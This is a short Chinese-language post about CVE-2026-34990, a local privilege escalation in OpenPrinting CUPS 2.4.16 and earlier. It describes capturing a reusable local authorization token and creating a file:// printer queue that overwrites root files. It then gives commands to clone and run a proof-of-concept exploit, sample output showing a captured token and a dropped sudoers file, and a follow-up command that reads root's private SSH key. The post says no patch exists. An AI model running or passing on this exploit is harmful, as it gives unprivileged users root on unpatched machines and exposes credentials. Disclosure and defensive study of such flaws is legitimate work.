CVE-2026-34990 - OpenPrinting CUPS 2.4.16 及更早版本中,本地非特权用户可诱使 cupsd 使用可重复使用的 Authorization: Local ... 令牌向攻击者控制的 localhost IPP 服务进行身份验证。该令牌足以在 localhost 上驱动 /admin/ 请求,攻击者可以将 CUPS-Create-Local-Printer 与 printer-is-shared=true 结合使用,从而持久化一个 file:///... 队列,即使正常的 FileDevice 策略会拒绝此类 URI。向该队列打印会导致任意 root 文件覆盖;下面的 PoC 利用这一原语投放一个 sudoers 片段,并演示 root 命令执行。在发布时,尚无公开可用的补丁。
git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990
python3 CVE-2026-34990.py
python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...
然后:
sudo -n cat /root/.ssh/id_rsa